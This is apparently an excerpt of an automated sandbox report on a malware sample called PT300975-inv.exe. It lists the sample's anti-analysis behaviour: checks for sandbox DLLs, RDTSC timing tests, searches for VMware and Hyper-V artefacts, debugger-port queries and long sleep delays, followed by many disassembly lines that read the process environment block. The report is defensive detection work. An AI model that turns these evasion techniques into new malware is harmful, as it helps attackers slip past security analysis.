          Source: C:\Windows\SysWOW64\ipconfig.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\cmd.exeProcess information set: NOOPENFILEERRORBOX

          Malware Analysis System Evasion:

          barindex
          Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)Show sources
          Source: PT300975-inv.exe, 00000000.00000002.345826499.0000000004021000.00000004.00000001.sdmpBinary or memory string: SBIEDLL.DLL!:ZONE.IDENTIFIER
          Tries to detect virtualization through RDTSC time measurementsShow sources
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeRDTSC instruction interceptor: First address: 00000000004098E4 second address: 00000000004098EA instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeRDTSC instruction interceptor: First address: 0000000000409B5E second address: 0000000000409B64 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Windows\SysWOW64\ipconfig.exeRDTSC instruction interceptor: First address: 00000000009998E4 second address: 00000000009998EA instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Windows\SysWOW64\ipconfig.exeRDTSC instruction interceptor: First address: 0000000000999B5E second address: 0000000000999B64 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeCode function: 2_2_00409A90 rdtsc
          Source: C:\Users\user\Desktop\PT300975-inv.exeThread delayed: delay time: 922337203685477
          Source: C:\Users\user\Desktop\PT300975-inv.exe TID: 7128Thread sleep time: -30000s >= -30000s
          Source: C:\Users\user\Desktop\PT300975-inv.exe TID: 7144Thread sleep time: -922337203685477s >= -30000s
          Source: C:\Windows\explorer.exe TID: 6584Thread sleep count: 34 > 30
          Source: C:\Windows\explorer.exe TID: 6584Thread sleep time: -68000s >= -30000s
          Source: C:\Windows\SysWOW64\ipconfig.exe TID: 4004Thread sleep time: -70000s >= -30000s
          Source: C:\Windows\explorer.exeLast function: Thread delayed
          Source: C:\Windows\explorer.exeLast function: Thread delayed
          Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
          Source: explorer.exe, 00000003.00000000.365412810.0000000008430000.00000004.00000001.sdmpBinary or memory string: SCSI\Disk&Ven_VMware&Prod_Virtual_disk\5&1ec51bf7&0&000000
          Source: explorer.exe, 00000003.00000000.365372094.00000000083EB000.00000004.00000001.sdmpBinary or memory string: VMware SATA CD00dRom0
          Source: explorer.exe, 00000003.00000000.365176187.00000000082E2000.00000004.00000001.sdmpBinary or memory string: \\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000025700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#000000001F400000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000026700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
          Source: explorer.exe, 00000003.00000000.360519668.0000000005D50000.00000002.00000001.sdmpBinary or memory string: A Virtual Machine could not be started because Hyper-V is not installed.
          Source: explorer.exe, 00000003.00000000.361158752.0000000006417000.00000004.00000001.sdmpBinary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
          Source: explorer.exe, 00000003.00000000.365372094.00000000083EB000.00000004.00000001.sdmpBinary or memory string: VMware SATA CD00
          Source: explorer.exe, 00000003.00000000.361158752.0000000006417000.00000004.00000001.sdmpBinary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
          Source: PT300975-inv.exe, 00000000.00000002.345826499.0000000004021000.00000004.00000001.sdmpBinary or memory string: VirtualMachineDetector
          Source: explorer.exe, 00000003.00000000.365176187.00000000082E2000.00000004.00000001.sdmpBinary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}>
          Source: explorer.exe, 00000003.00000000.360519668.0000000005D50000.00000002.00000001.sdmpBinary or memory string: A communication protocol error has occurred between the Hyper-V Host and Guest Compute Service.
          Source: explorer.exe, 00000003.00000000.360519668.0000000005D50000.00000002.00000001.sdmpBinary or memory string: The communication protocol version between the Hyper-V Host and Guest Compute Services is not supported.
          Source: explorer.exe, 00000003.00000000.365176187.00000000082E2000.00000004.00000001.sdmpBinary or memory string: SCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\5&280b647&0&000000
          Source: explorer.exe, 00000003.00000000.365412810.0000000008430000.00000004.00000001.sdmpBinary or memory string: SCSI\CDROM&VEN_NECVMWAR&PROD_VMWARE_SATA_CD00\5&280B647&0&000000-;
          Source: explorer.exe, 00000003.00000000.360519668.0000000005D50000.00000002.00000001.sdmpBinary or memory string: An unknown internal message was received by the Hyper-V Compute Service.
          Source: explorer.exe, 00000003.00000002.604467265.000000000095C000.00000004.00000020.sdmpBinary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}G
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeProcess information queried: ProcessInformation
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeProcess queried: DebugPort
          Source: C:\Windows\SysWOW64\ipconfig.exeProcess queried: DebugPort
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeCode function: 2_2_00409A90 rdtsc
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeCode function: 2_2_0040ACD0 LdrLoadDll,
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeCode function: 2_2_0570C577 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeCode function: 2_2_0570C577 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeCode function: 2_2_05707D50 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeCode function: 2_2_05723D43 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeCode function: 2_2_05763540 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeCode function: 2_2_0576A537 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeCode function: 2_2_057AE539 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeCode function: 2_2_05714D3B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeCode function: 2_2_05714D3B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeCode function: 2_2_05714D3B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeCode function: 2_2_057B8D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeCode function: 2_2_056F3D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeCode function: 2_2_056F3D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeCode function: 2_2_056F3D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeCode function: 2_2_056F3D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeCode function: 2_2_056F3D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeCode function: 2_2_056F3D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeCode function: 2_2_056F3D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeCode function: 2_2_056F3D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeCode function: 2_2_056F3D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeCode function: 2_2_056F3D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeCode function: 2_2_056F3D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeCode function: 2_2_056F3D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeCode function: 2_2_056F3D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeCode function: 2_2_056EAD30 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeCode function: 2_2_05798DF1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeCode function: 2_2_056FD5E0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeCode function: 2_2_056FD5E0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeCode function: 2_2_057AFDE2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeCode function: 2_2_057AFDE2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeCode function: 2_2_057AFDE2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeCode function: 2_2_057AFDE2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeCode function: 2_2_05766DC9 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeCode function: 2_2_05766DC9 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeCode function: 2_2_05766DC9 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeCode function: 2_2_05766DC9 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeCode function: 2_2_05766DC9 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeCode function: 2_2_05766DC9 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeCode function: 2_2_05711DB5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeCode function: 2_2_05711DB5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeCode function: 2_2_05711DB5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeCode function: 2_2_057135A1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeCode function: 2_2_057B05AC mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeCode function: 2_2_057B05AC mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeCode function: 2_2_056E2D8A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeCode function: 2_2_056E2D8A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeCode function: 2_2_056E2D8A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeCode function: 2_2_056E2D8A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeCode function: 2_2_056E2D8A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeCode function: 2_2_0571FD9B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeCode function: 2_2_0571FD9B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeCode function: 2_2_05712581 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeCode function: 2_2_05712581 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeCode function: 2_2_05712581 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeCode function: 2_2_05712581 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeCode function: 2_2_0570746D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeCode function: 2_2_0577C450 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeCode function: 2_2_0577C450 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeCode function: 2_2_0571A44B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeCode function: 2_2_0571BC2C mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeCode function: 2_2_057B740D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeCode function: 2_2_057B740D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeCode function: 2_2_057B740D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeCode function: 2_2_057A1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeCode function: 2_2_057A1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeCode function: 2_2_057A1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeCode function: 2_2_057A1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeCode function: 2_2_057A1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeCode function: 2_2_057A1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeCode function: 2_2_057A1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeCode function: 2_2_057A1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeCode function: 2_2_057A1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeCode function: 2_2_057A1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeCode function: 2_2_057A1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeCode function: 2_2_057A1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeCode function: 2_2_057A1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeCode function: 2_2_057A1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeCode function: 2_2_05766C0A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeCode function: 2_2_05766C0A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeCode function: 2_2_05766C0A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeCode function: 2_2_05766C0A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeCode function: 2_2_057A14FB mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeCode function: 2_2_05766CF0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeCode function: 2_2_05766CF0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeCode function: 2_2_05766CF0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeCode function: 2_2_057B8CD6 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeCode function: 2_2_056F849B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeCode function: 2_2_056FFF60 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeCode function: 2_2_057B8F6A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeCode function: 2_2_056FEF40 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeCode function: 2_2_056E4F2E mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeCode function: 2_2_056E4F2E mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeCode function: 2_2_0571E730 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeCode function: 2_2_0570F716 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeCode function: 2_2_0577FF10 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeCode function: 2_2_0577FF10 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeCode function: 2_2_057B070D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeCode function: 2_2_057B070D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeCode function: 2_2_0571A70E mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeCode function: 2_2_0571A70E mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeCode function: 2_2_057237F5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeCode function: 2_2_05767794 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeCode function: 2_2_05767794 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeCode function: 2_2_05767794 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeCode function: 2_2_056F8794 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeCode function: 2_2_056F766D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeCode function: 2_2_0570AE73 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeCode function: 2_2_0570AE73 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeCode function: 2_2_0570AE73 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeCode function: 2_2_0570AE73 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeCode function: 2_2_0570AE73 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeCode function: 2_2_056F7E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeCode function: 2_2_056F7E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeCode function: 2_2_056F7E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeCode function: 2_2_056F7E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeCode function: 2_2_056F7E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeCode function: 2_2_056F7E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeCode function: 2_2_057AAE44 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeCode function: 2_2_057AAE44 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeCode function: 2_2_0579FE3F mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeCode function: 2_2_056EE620 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeCode function: 2_2_0571A61C mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeCode function: 2_2_0571A61C mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeCode function: 2_2_056EC600 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeCode function: 2_2_056EC600 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeCode function: 2_2_056EC600 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeCode function: 2_2_05718E00 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeCode function: 2_2_057A1608 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeCode function: 2_2_056F76E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeCode function: 2_2_057116E0 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeCode function: 2_2_057B8ED6 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeCode function: 2_2_05728EC7 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeCode function: 2_2_0579FEC0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeCode function: 2_2_057136CC mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeCode function: 2_2_057646A7 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeCode function: 2_2_057B0EA5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeCode function: 2_2_057B0EA5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeCode function: 2_2_057B0EA5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeCode function: 2_2_0577FE87 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeCode function: 2_2_056EC962 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeCode function: 2_2_056EB171 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeCode function: 2_2_056EB171 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeCode function: 2_2_0570B944 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeCode function: 2_2_0570B944 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeCode function: 2_2_0571513A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeCode function: 2_2_0571513A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeCode function: 2_2_05704120 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeCode function: 2_2_05704120 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeCode function: 2_2_05704120 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeCode function: 2_2_05704120 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeCode function: 2_2_05704120 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeCode function: 2_2_056E9100 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeCode function: 2_2_056E9100 mov eax, dword ptr fs:[00000030h]
